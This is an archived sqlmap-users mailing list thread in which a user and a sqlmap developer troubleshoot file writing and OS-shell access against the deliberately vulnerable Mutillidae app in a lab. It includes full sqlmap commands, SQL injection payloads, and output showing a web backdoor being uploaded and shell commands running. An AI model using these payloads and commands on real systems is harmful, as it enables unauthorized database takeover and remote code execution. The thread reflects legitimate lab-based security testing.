flexible recovery options mean your > data > >> >> >>> is > >> >> >>> safe, > >> >> >>> secure and there when you need it. Data protection magic? > >> >> >>> Nope - It's vRanger. Get your free trial download today. > >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >>> _______________________________________________ > >> >> >>> sqlmap-users mailing list > >> >> >>> sql...@li... > >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > >> >> >> > >> >> >> > >> >> >> -- > >> >> >> > >> >> >> Ahmed Shawky El-Antry > >> >> >> Pen-tester, Programmer and System administrator > >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com" > >> >> >> Isecur1ty team member"http://www.isecur1ty.org" > >> >> >> Twitter @lnxg33k > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > ------------------------------------------------------------------------------ > >> >> >> Simplify data backup and recovery for your virtual environment > with > >> >> >> vRanger. > >> >> >> Installation's a snap, and flexible recovery options mean your > data > >> >> >> is > >> >> >> safe, > >> >> >> secure and there when you need it. Data protection magic? > >> >> >> Nope - It's vRanger. Get your free trial download today. > >> >> >> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >> _______________________________________________ > >> >> >> sqlmap-users mailing list > >> >> >> sql...@li... > >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > >> >> > > >> >> > > >> >> > > >> >> > > >> >> > > ------------------------------------------------------------------------------ > >> >> > Simplify data backup and recovery for your virtual environment with > >> >> > vRanger. > >> >> > Installation's a snap, and flexible recovery options mean your data > >> >> > is > >> >> > safe, > >> >> > secure and there when you need it. Data protection magic? > >> >> > Nope - It's vRanger. Get your free trial download today. > >> >> > http://p.sf.net/sfu/quest-sfdev2dev > >> >> > _______________________________________________ > >> >> > sqlmap-users mailing list > >> >> > sql...@li... > >> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > > >> >> > > >> >> > >> >> > >> >> > >> >> -- > >> >> Miroslav Stampar (@stamparm) > >> >> > >> >> E-mail: miroslav.stampar (at) gmail.com > >> >> PGP Key ID: 0xB5397B1B > >> > > >> > > >> > > >> > -- > >> > > >> > Ahmed Shawky El-Antry > >> > Pen-tester, Programmer and System administrator > >> > lnxg33k owner "http://lnxg33k.wordpress.com" > >> > Isecur1ty team member"http://www.isecur1ty.org" > >> > Twitter @lnxg33k > >> > > >> > >> > >> > >> -- > >> Miroslav Stampar (@stamparm) > >> > >> E-mail: miroslav.stampar (at) gmail.com > >> PGP Key ID: 0xB5397B1B > >> > >> > >> > ------------------------------------------------------------------------------ > >> Simplify data backup and recovery for your virtual environment with > >> vRanger. > >> Installation's a snap, and flexible recovery options mean your data is > >> safe, > >> secure and there when you need it. Data protection magic? > >> Nope - It's vRanger. Get your free trial download today. > >> http://p.sf.net/sfu/quest-sfdev2dev > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 10:39:23
|
Hi Chris, Please, provide sqlmap with: --data "view_user_name=admin&password=adminpass&Submit_button=Submit" By invalid I mean, a view_user_name (perhaps in your version of mutillidae it's called username) value which is accepted as well as a valid password in this case. Cheers, Bernardo On 7 July 2011 11:37, Chris Oakley <chr...@gm...> wrote: > Hi Bernardo > > I'm not sure what you mean when you say that the POST parameters are > invalid. I tried the following: > > C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti > llidae/index.php?page=user-info.php" --data "username=foo&password=bar > &user-info-php-submit-button=View+Account+details" -p "username" --os-shell > > and the following occurs: > > [11:31:47] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.5, Apache 2.2.17 > back-end DBMS: MySQL 5.0 > [11:31:47] [INFO] going to use a web backdoor for command prompt > [11:31:47] [INFO] fingerprinting the back-end DBMS operating system > [11:31:48] [INFO] the back-end DBMS operating system is Windows > [11:31:48] [INFO] trying to upload the file stager > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP >> > [11:31:49] [WARNING] unable to retrieve the web server document root > please provide the web server document root [C:/xampp/htdocs/,C:/Inetp > ub/wwwroot/]: C:\wamp\www\mutillidae > [11:32:01] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload th > e agent [Enter for None]: C:\wamp\www\mutillidae > [11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/ > mutillidae' > [11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/ > mutillidae/mutillidae' > [11:32:08] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 2 times > [11:32:08] [INFO] Fetched data logged to text files under 'C:\Program > Files\sqlmap-0.9\output\localhost' > > [*] shutting down at 11:32:08 > > Could it be to do with: > > [11:31:49] [WARNING] unable to retrieve the web server document root > please provide the web server document root [C:/xampp/htdocs/,C:/Inetp > ub/wwwroot/]: C:\wamp\www\mutillidae > [11:32:01] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload th > e agent [Enter for None]: C:\wamp\www\mutillidae > > Regards > > Chris > > On 6 July 2011 23:52, Bernardo Damele A. G. <ber...@gm...> > wrote: >> >> Hi Chris, >> >> No worries. >> If you want command execution, sqlmap can handle it automatically also >> when it's MySQL and you've got a writable folder within the document >> root, --os-cmd and --os-shell. Also, --os-pwn can work in this >> scenario too. >> The file stager uploaded is 0KB because you provide invalid values to >> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to >> upload the file stager against MySQL. >> >> See: >> --8<-- >> $ python sqlmap.py -u >> "http://debian32/mutillidae/index.php?page=user-info.php" --data >> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 >> --os-shell --flush-session >> >> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover >> tool >> http://sqlmap.sourceforge.net >> >> [!] legal disclaimer: usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility >> to obey all applicable local, state and federal laws. Authors assume >> no liability and are not responsible for any misuse or damage caused >> by this program >> >> [*] starting at 23:49:52 >> >> [23:49:52] [INFO] setting file for logging HTTP traffic >> [23:49:52] [INFO] using >> >> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' >> as session file >> [23:49:52] [INFO] flushing session file >> [23:49:52] [INFO] testing connection to the target url >> [23:49:52] [INFO] heuristics detected web page charset 'ascii' >> [23:49:52] [INFO] testing if the url is stable, wait a few seconds >> [23:49:53] [INFO] url is stable >> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic >> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not >> dynamic >> [23:49:53] [INFO] heuristic test shows that POST parameter >> 'view_user_name' might be injectable (possible DBMS: MySQL) >> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' >> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >> HAVING clause' >> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND >> error-based - WHERE or HAVING clause' injectable >> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 >> AND time-based blind' injectable >> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns >> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION >> query (NULL) - 1 to 10 columns' injectable >> POST parameter 'view_user_name' is vulnerable. Do you want to keep >> testing the others? [y/N] >> sqlmap identified the following injection points with a total of 30 >> HTTP(s) requests: >> --- >> Place: POST >> Parameter: view_user_name >> Type: error-based >> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT >> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) >> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM >> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND >> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 1 to 10 columns >> Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, >> >> CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) >> AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND >> 'TOwv'='TOwv&password=adminpass&Submit_button=Submit >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: view_user_name=admin' AND SLEEP(5) AND >> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit >> --- >> >> [23:51:31] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 5.2.6, Apache 2.2.9 >> back-end DBMS: MySQL 5.0 >> [23:51:31] [INFO] going to use a web backdoor for command prompt >> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system >> [23:51:31] [INFO] the back-end DBMS operating system is Linux >> [23:51:31] [INFO] trying to upload the file stager >> which web application language does the web server support? >> [1] ASP >> [2] ASPX >> [3] PHP (default) >> [4] JSP >> > >> [23:51:32] [WARNING] unable to retrieve the web server document root >> please provide the web server document root [/var/www/]: >> [23:51:32] [WARNING] unable to retrieve any web server path >> please provide any additional web server full path to try to upload >> the agent [Enter for None]: /var/www/test >> [23:51:35] [WARNING] unable to upload the file stager on '/var/www' >> [23:51:35] [INFO] the file stager has been successfully uploaded on >> '/var/www/test' - http://debian32:80/test/tmpugbmo.php >> [23:51:35] [INFO] the backdoor has probably been successfully uploaded >> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php >> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press >> ENTER >> os-shell> id >> do you want to retrieve the command standard output? [Y/n/a] >> command standard output: 'uid=33(www-data) gid=33(www-data) >> groups=33(www-data)' >> >> os-shell> pwd >> do you want to retrieve the command standard output? [Y/n/a] >> command standard output: '/var/www/test' >> >> os-shell> exit >> [23:51:44] [WARNING] HTTP error codes detected during testing: >> 404 (Not Found) - 1 times >> [23:51:44] [INFO] Fetched data logged to text files under >> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' >> >> [*] shutting down at 23:51:44 >> --8<-- >> >> Cheers, >> Bernardo >> >> >> On 6 July 2011 23:46, <chr...@gm...> wrote: >> > Hi >> > >> > Thanks. It turns out I was being an idiot. With absolute paths I didn't >> > realise that this also includes the destination file name. With that >> > included, it works like a dream. >> > >> > What I haven't managed to get going properly yet is the --os-cmd flag. >> > The temp stager file does appear, but is empty, 0KB. However; I think I'll >> > save that one for another day! >> > >> > Regards >> > >> > Chris >> > ------------------ >> > >> > -----Original Message----- >> > From: "Bernardo Damele A. G." <ber...@gm...> >> > Date: Wed, 6 Jul 2011 23:42:22 >> > To: Chris Oakley<chr...@gm...> >> > Cc: <sql...@li...> >> > Subject: Re: [sqlmap-users] File Writing >> > >> > Hi Chris, >> > >> > To me it works well: >> > --8<-- >> > $ python sqlmap.py -u >> > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p >> > view_user_name --risk 3 --level 3 --parse-errors --file-write >> > /etc/passwd --file-dest /tmp/test --flush-session >> > >> > sqlmap/1.0-dev (r4217) - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.sourceforge.net >> > >> > [!] legal disclaimer: usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility >> > to obey all applicable local, state and federal laws. Authors assume >> > no liability and are not responsible for any misuse or damage caused >> > by this program >> > >> > [*] starting at 23:26:35 >> > >> > [23:26:35] [INFO] setting file for logging HTTP traffic >> > [23:26:35] [INFO] testing connection to the target url >> > [23:26:35] [INFO] heuristics detected web page charset 'ascii' >> > [23:26:35] [INFO] searching for forms >> > [#1] form: >> > POST http://debian32:80/mutillidae/index.php?page=user-info.php >> > POST data: view_user_name=&password=&Submit_button=Submit >> > do you want to test this form? [Y/n/q] >> >> >> > Edit POST data [default: >> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields >> > detected): >> > do you want to fill blank fields with random values? [Y/n] >> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you >> > provided is not inside the GET >> > [23:26:37] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' >> > as session file >> > [23:26:37] [INFO] flushing session file >> > [23:26:37] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' >> > as results file >> > [23:26:37] [INFO] heuristics detected web page charset 'ascii' >> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds >> > [23:26:38] [INFO] url is stable >> > [23:26:38] [INFO] heuristic test shows that POST parameter >> > 'view_user_name' might be injectable (possible DBMS: MySQL) >> > [23:26:38] [INFO] testing sql injection on POST parameter >> > 'view_user_name' >> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> > clause' >> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >> > clause (Generic comment)' >> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based >> > blind - WHERE or HAVING clause (Generic comment)' injectable >> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >> > HAVING clause' >> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or >> > HAVING clause' >> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR >> > error-based - WHERE or HAVING clause' injectable >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy >> > query)' >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' >> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> > [23:26:43] [INFO] target url appears to be UNION injectable with 4 >> > columns >> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION >> > query (NULL) - 1 to 10 columns' injectable >> > [23:26:43] [WARNING] in OR boolean-based injections, please consider >> > usage of switch --drop-set-cookie if you experience any problems >> > during data retrieval >> > POST parameter 'view_user_name' is vulnerable. Do you want to keep >> > testing the others? [y/N] >> > sqlmap identified the following injection points with a total of 148 >> > HTTP(s) requests: >> > --- >> > Place: POST >> > Parameter: view_user_name >> > Type: boolean-based blind >> > Title: OR boolean-based blind - WHERE or HAVING clause (Generic >> > comment) >> > Payload: view_user_name=-5244' OR NOT (1884=1884)-- >> > &password=bDXj&Submit_button=Submit >> > >> > Type: error-based >> > Title: MySQL OR error-based - WHERE or HAVING clause >> > Payload: view_user_name=-3024' OR 1 GROUP BY >> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 >> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- >> > &password=bDXj&Submit_button=Submit >> > >> > Type: UNION query >> > Title: MySQL UNION query (NULL) - 1 to 10 columns >> > Payload: view_user_name=IZBb' UNION ALL SELECT NULL, >> > >> > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) >> > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, >> > NULL#&password=bDXj&Submit_button=Submit >> > --- >> > >> > do you want to exploit this SQL injection? [Y/n] >> > [23:26:46] [INFO] testing MySQL >> > [23:26:46] [INFO] confirming MySQL >> > [23:26:46] [INFO] the back-end DBMS is MySQL >> > >> > web application technology: PHP 5.2.6, Apache 2.2.9 >> > back-end DBMS: MySQL >= 5.0.0 >> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system >> > [23:26:46] [INFO] the back-end DBMS operating system is Linux >> > [23:26:46] [WARNING] if the problem persists with 'None' values please >> > try to use hidden switch --no-cast (fixing problems with some >> > collation issues) >> > do you want confirmation that the file '/tmp/test' has been >> > successfully written on the back-end DBMS file system? [Y/n] >> > [23:26:48] [INFO] the file has been successfully written and its size >> > is 1848 bytes, but the size differs from the local file '/etc/passwd' >> > (1845 bytes) >> > [23:26:48] [WARNING] expect junk characters inside the file as a >> > leftover from UNION query >> > [23:26:48] [INFO] you can find results of scanning in multiple targets >> > mode inside the CSV file >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' >> > >> > [*] shutting down at 23:26:48 >> > --8<-- >> > >> > Cheers, >> > Bernardo >> > >> > >> > On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote: >> >> Hi >> >> >> >> I'm playing with file writing. I have a full privs root user set up in >> >> mysql and am using >> >> >> >> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 >> >> to play with. I've set up a /temp folder below the web root of the >> >> app. >> >> I've put a file "evil.php" in the sqlmap working directory. I've also >> >> changed the permissions for all users on the temp folder to write >> >> access >> >> allowed. >> >> >> >> I'm using the following input to try and upload this file: >> >> >> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u >> >> "http://localhost/mutillidae/ind >> >> ex.php?page=user-info.php" --data >> >> "username=&password=&user-info-php-submit-butt >> >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" >> >> --file-wr >> >> ite "evil.php" --file-dest "temp/evil.php" >> >> >> >> This is with the latest dev build by the way. >> >> >> >> The output I get is: >> >> >> >> [18:00:03] [INFO] the back-end DBMS is MySQL >> >> web server operating system: Windows >> >> web application technology: PHP 5.3.5, Apache 2.2.17 >> >> back-end DBMS: MySQL 5.0 >> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system >> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows >> >> [18:00:04] [WARNING] if the problem persists with 'None' values please >> >> try >> >> to us >> >> e hidden switch --no-cast (fixing problems with some collation issues) >> >> do you want confirmation that the file 'temp/evil.php' has been >> >> successfully >> >> wri >> >> tten on the back-end DBMS file system? [Y/n] >> >> [18:00:12] [WARNING] it looks like the file has not been written, this >> >> can >> >> occur >> >> if the DBMS process' user has no write privileges in the destination >> >> path >> >> [18:00:12] [WARNING] expect junk characters inside the file as a >> >> leftover >> >> from U >> >> NION query >> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program >> >> Files\sqlm >> >> ap-0.9\output\localhost' >> >> >> >> [*] shutting down at 18:00:12 >> >> >> >> and sure enough the file isn't written. I've also tried using the >> >> --no-cast >> >> switch, to no avail. >> >> >> >> Does anyone have any ideas on what could be going wrong here? I can >> >> use the >> >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd >> >> and >> >> --os-pwn commands also fail at the stager upload phase, probably for >> >> similar >> >> reasons. >> >> >> >> Any help would be appreciated >> >> >> >> Cheers >> >> >> >> Chris >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> All of the data generated in your IT infrastructure is seriously >> >> valuable. >> >> Why? It contains a definitive record of application performance, >> >> security >> >> threats, fraudulent activity, and more. Splunk takes this data and >> >> makes >> >> sense of it. IT sense. And common sense. >> >> http://p.sf.net/sfu/splunk-d2d-c2 >> >>_______________________________________________ >> >> sqlmap-users mailing list >> >> sql...@li... >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> > >> > >> > >> > -- >> > Bernardo Damele A. G. >> > >> > E-mail / Jabber: bernardo.damele (at) gmail.com >> > Mobile: +447788962949 (UK 07788962949) >> > PGP Key ID: Unavailable >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Chris O. <chr...@gm...> - 2011-07-07 10:37:14
|
Hi Bernardo I'm not sure what you mean when you say that the POST parameters are invalid. I tried the following: C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti llidae/index.php?page=user-info.php" --data "username=foo&password=bar &user-info-php-submit-button=View+Account+details" -p "username" --os-shell and the following occurs: [11:31:47] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0 [11:31:47] [INFO] going to use a web backdoor for command prompt [11:31:47] [INFO] fingerprinting the back-end DBMS operating system [11:31:48] [INFO] the back-end DBMS operating system is Windows [11:31:48] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > [11:31:49] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/xampp/htdocs/,C:/Inetp ub/wwwroot/]: C:\wamp\www\mutillidae [11:32:01] [WARNING] unable to retrieve any web server path please provide any additional web server full path to try to upload th e agent [Enter for None]: C:\wamp\www\mutillidae [11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/ mutillidae' [11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/ mutillidae/mutillidae' [11:32:08] [WARNING] HTTP error codes detected during testing: 404 (Not Found) - 2 times [11:32:08] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost' [*] shutting down at 11:32:08 Could it be to do with: [11:31:49] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/xampp/htdocs/,C:/Inetp ub/wwwroot/]: C:\wamp\www\mutillidae [11:32:01] [WARNING] unable to retrieve any web server path please provide any additional web server full path to try to upload th e agent [Enter for None]: C:\wamp\www\mutillidae Regards Chris On 6 July 2011 23:52, Bernardo Damele A. G. <ber...@gm...>wrote: > Hi Chris, > > No worries. > If you want command execution, sqlmap can handle it automatically also > when it's MySQL and you've got a writable folder within the document > root, --os-cmd and --os-shell. Also, --os-pwn can work in this > scenario too. > The file stager uploaded is 0KB because you provide invalid values to > the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to > upload the file stager against MySQL. > > See: > --8<-- > $ python sqlmap.py -u > "http://debian32/mutillidae/index.php?page=user-info.php" --data > "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 > --os-shell --flush-session > > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [!] legal disclaimer: usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 23:49:52 > > [23:49:52] [INFO] setting file for logging HTTP traffic > [23:49:52] [INFO] using > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' > as session file > [23:49:52] [INFO] flushing session file > [23:49:52] [INFO] testing connection to the target url > [23:49:52] [INFO] heuristics detected web page charset 'ascii' > [23:49:52] [INFO] testing if the url is stable, wait a few seconds > [23:49:53] [INFO] url is stable > [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic > [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not > dynamic > [23:49:53] [INFO] heuristic test shows that POST parameter > 'view_user_name' might be injectable (possible DBMS: MySQL) > [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' > [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or > HAVING clause' > [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND > error-based - WHERE or HAVING clause' injectable > [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' > [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 > AND time-based blind' injectable > [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns > [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION > query (NULL) - 1 to 10 columns' injectable > POST parameter 'view_user_name' is vulnerable. Do you want to keep > testing the others? [y/N] > sqlmap identified the following injection points with a total of 30 > HTTP(s) requests: > --- > Place: POST > Parameter: view_user_name > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) > THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND > 'ekpw'='ekpw&password=adminpass&Submit_button=Submit > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, > > CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) > AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND > 'TOwv'='TOwv&password=adminpass&Submit_button=Submit > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: view_user_name=admin' AND SLEEP(5) AND > 'BfoH'='BfoH&password=adminpass&Submit_button=Submit > --- > > [23:51:31] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.2.6, Apache 2.2.9 > back-end DBMS: MySQL 5.0 > [23:51:31] [INFO] going to use a web backdoor for command prompt > [23:51:31] [INFO] fingerprinting the back-end DBMS operating system > [23:51:31] [INFO] the back-end DBMS operating system is Linux > [23:51:31] [INFO] trying to upload the file stager > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP > > > [23:51:32] [WARNING] unable to retrieve the web server document root > please provide the web server document root [/var/www/]: > [23:51:32] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload > the agent [Enter for None]: /var/www/test > [23:51:35] [WARNING] unable to upload the file stager on '/var/www' > [23:51:35] [INFO] the file stager has been successfully uploaded on > '/var/www/test' - http://debian32:80/test/tmpugbmo.php > [23:51:35] [INFO] the backdoor has probably been successfully uploaded > on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php > [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER > os-shell> id > do you want to retrieve the command standard output? [Y/n/a] > command standard output: 'uid=33(www-data) gid=33(www-data) > groups=33(www-data)' > > os-shell> pwd > do you want to retrieve the command standard output? [Y/n/a] > command standard output: '/var/www/test' > > os-shell> exit > [23:51:44] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 1 times > [23:51:44] [INFO] Fetched data logged to text files under > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' > > [*] shutting down at 23:51:44 > --8<-- > > Cheers, > Bernardo > > > On 6 July 2011 23:46, <chr...@gm...> wrote: > > Hi > > > > Thanks. It turns out I was being an idiot. With absolute paths I didn't > realise that this also includes the destination file name. With that > included, it works like a dream. > > > > What I haven't managed to get going properly yet is the --os-cmd flag. > The temp stager file does appear, but is empty, 0KB. However; I think I'll > save that one for another day! > > > > Regards > > > > Chris > > ------------------ > > > > -----Original Message----- > > From: "Bernardo Damele A. G." <ber...@gm...> > > Date: Wed, 6 Jul 2011 23:42:22 > > To: Chris Oakley<chr...@gm...> > > Cc: <sql...@li...> > > Subject: Re: [sqlmap-users] File Writing > > > > Hi Chris, > > > > To me it works well: > > --8<-- > > $ python sqlmap.py -u > > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p > > view_user_name --risk 3 --level 3 --parse-errors --file-write > > /etc/passwd --file-dest /tmp/test --flush-session > > > > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover > tool > > http://sqlmap.sourceforge.net > > > > [!] legal disclaimer: usage of sqlmap for attacking targets without > > prior mutual consent is illegal. It is the end user's responsibility > > to obey all applicable local, state and federal laws. Authors assume > > no liability and are not responsible for any misuse or damage caused > > by this program > > > > [*] starting at 23:26:35 > > > > [23:26:35] [INFO] setting file for logging HTTP traffic > > [23:26:35] [INFO] testing connection to the target url > > [23:26:35] [INFO] heuristics detected web page charset 'ascii' > > [23:26:35] [INFO] searching for forms > > [#1] form: > > POST http://debian32:80/mutillidae/index.php?page=user-info.php > > POST data: view_user_name=&password=&Submit_button=Submit > > do you want to test this form? [Y/n/q] > >> > > Edit POST data [default: > > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields > > detected): > > do you want to fill blank fields with random values? 